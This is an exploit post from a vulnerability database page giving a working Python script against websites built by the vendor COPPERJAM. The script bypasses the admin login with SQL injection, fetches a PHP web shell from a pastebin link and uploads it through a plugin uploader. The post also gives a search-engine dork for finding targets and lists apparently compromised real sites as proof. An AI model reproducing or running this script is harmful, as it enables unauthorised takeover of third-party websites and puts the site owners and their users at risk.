Created By COPPERJAM Admin Bypass To Shell Upload

2022.02.07
dz B14ck_Dz (DZ) dz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

COPPERJAM COMPANY SCRIPT EXPLOIT : Dork in Bing or Google : intext:"created by copperjam" AUTO EXPLOIT :> ///////////////////////////////////////////////////////// #!/usr/bin/python3 # Exploit Author: B14ck_dz # Vendor : Copperjam.com # Tested on: Ubuntu / Windows 10 # Date: 6/02/2022 import time, argparse, requests, sys from os import remove from bs4 import BeautifulSoup from colorama import init from colorama import Fore from colorama import Back from colorama import Style init(autoreset=True) print(""" Sites Created By COPPERJAM Shell Uploader\n Written by B14ck_dz Twitter : https://twitter.com/oussama1337 Zone-H : http://zone-h.org/archive/notifier=B14ck_dz Discord : https://discord.gg/A8ptg8Dbu4\n""") def my_args(): parser = argparse.ArgumentParser() parser.add_argument("-u","--url",type=str,required=True,help="url of target") my_arguments = parser.parse_args() return my_arguments headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"} def exploit(): try: url = my_args().url if url.endswith('/'): url = url[:-1] login_data = { 'Email' : "' OR ''='", 'Password' : "' OR ''='" } with requests.Session() as s: login_path = f"{url}/admin/Login/process/" r = s.post(login_path,headers=headers,data=login_data) print( Fore.GREEN + "[+] Logged in succesfully") except Exception: print(Fore.RED + f"[!] Make Sure You Entred URL Correctly") print("Example : http://target.com") sys.exit(1) #soup = BeautifulSoup(r.content, 'html5lib') #print(soup) #proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} phpwebshell = requests.get("https://pastebin.com/raw/119SZL4p", 'html.parser') phpfile = open('tmp.php', 'w') phpfile.write(str(phpwebshell.text)) phpfile.close() files = {'file': open('tmp.php', 'rb')} r = s.post(f"{url}/admin/plugins/data_manage_v02/php/cj-image-uploader.php?folderpath=Li9kYXRhL2FwcC8=&pluginpath=Li4vLi4vcGx1Z2lucy9kYXRhX21hbmFnZV92MDIv&extension=cGhw&tagname=", headers=headers, files=files) soup = BeautifulSoup(r.content, 'html5lib') result = [soup.body.string] try: if "php" in result[0]: try: phpshell = result[0][27:result[0].find("php")+3] except: print(result) else: print(Fore.RED + "\nExploit Didn't Work :'(") sys.exit(1) except : print(Fore.RED + "I Didn't Find The Required Files to Exploit :'( ") print("You Can Try it Manualy : ") print(f"Admin Panel : {url}/admin/index.php") print(f"User: {Fore.GREEN}'OR ''='") print(f"Pass: {Fore.GREEN}'OR ''='") sys.exit(1) print(f"{url}/admin/data/app/{phpshell}") print(f"Shell Password : {Fore.RED} root") remove('tmp.php') exploit() ////////////////////////////////////////////////////////////// POC : https://www.trimacppl.com/b14ck.php https://sarvodayafoundation.org/admin/b14ck.php https://housepital.in/b14ck.php HAPPY HACKING DON'T FORGET TO JOIN MY DISCORD SERVER :)


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top